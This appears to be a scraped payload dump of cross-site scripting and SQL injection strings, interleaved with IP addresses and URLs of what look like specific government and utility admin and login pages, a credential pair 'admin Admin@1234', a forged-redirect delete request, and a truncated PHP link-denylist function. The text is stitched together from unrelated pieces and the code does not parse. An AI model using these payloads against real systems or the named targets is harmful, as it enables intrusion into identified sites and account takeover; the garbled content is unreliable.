/*!*/
%0A%22%3E%3Cscript%3Ealert(444)%3C%2Fscript%3E
“>
“>
<%script>alert(‘XSS’)<%/script>
%uff1cscript%uff1ealert(9);%uff1c/script%uff1e
‘/>
<%tag style=”xss:expression(alert(‘XSS’))”>
‘ onmouseover=prompt(929623) bad=’
%0A%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%35%34%34%34%29%3C%2F%73%63%72%69%70%74%3E
1
1
‘>>
alert(XSS)
”;!–“=&{()}
“onmouseover=prompt(959295)>
“%20onmouseover=prompt(908001)%20bad=”
Click me
“0′; waitfor delay ‘0:0:25’ –
admin’or ‘1’ = ‘1’
\
“><script>alert(444)</script>
%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%32%33%29%3C%2F%73%63%72%69%70%74%3E
223E3C7363726970743E616C65727428343434293C2F7363726970743E
‘/
“
<? echo(‘<SCR)’; echo(‘IPT>alert(“XSS”)’); ?>
Bapatla’=sleep(6.896)=’
http://203.123.33.197/bbnl/content/
/**
 * Callback that rewrites part of a matched link.
 *
 * Every occurrence of $match[1] is replaced, via str_replace(), with the
 * output of a preg_replace() call whose pattern targets href= values that
 * contain script-related tokens (alert(, the entity-encoded form of alert(,
 * javascript:, livescript:, mocha:, charset=, window., document., .cookie).
 *
 * NOTE(review): this listing is cut off in the middle of the pattern, so the
 * rest of the token list, the replacement string and the str_replace()
 * subject are not visible here. The page also shows typographic quotes in
 * place of ASCII quotes, so the fragment does not parse as printed.
 *
 * NOTE(review): the visible pattern is a token denylist applied to the raw
 * attribute text. A denylist only covers the spellings it names, so it should
 * not be the sole control: escape output for the HTML context it lands in
 * and accept link schemes from an allowlist.
 *
 * @param array $match presumably a preg_replace_callback() match array;
 *                     index 1 is the part that gets rewritten - confirm
 *                     against the caller
 * @return mixed the str_replace() result (a string when the subject is a
 *               string; the subject is not visible in this listing)
 */
protected function _js_link_removal($match)
{
//echo “in link removal”;
// Search term is the captured group; the replacement is that same text after
// the href denylist has been applied (pattern truncated below).
return str_replace($match[1],
preg_replace(‘#href=.*?(?:alert\(|alert&\#40;|javascript:|livescript:|mocha:|charset=|window\.|document\.|\.cookie|
: http://203.110.84.86:2056/_layouts/PowerGrid/user/index.aspx , http://203.110.84.86:2056/_layouts/PowerGrid/admin/loginpage.aspx
“>
:::html 123″ onmouseover=”alert(document.domain);
admin Admin@1234
(http://164.100.140.21/rkvyodisha) %3Cscript xmlns=’http://www.w3.org/1999/xhtml’%3Ealert(1)%3C/script%3E
\”;alert(‘XSS’);// “>
“>
“>
‘+alert(‘Hllo’)&&null==’
“>
confirm(‘XSS’)
onerror=javascript:alert(2)
“>
“””””””>
http;//test.com>
‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>=&{}
”;!–“=&{()}
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
exp/*
- XSS
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE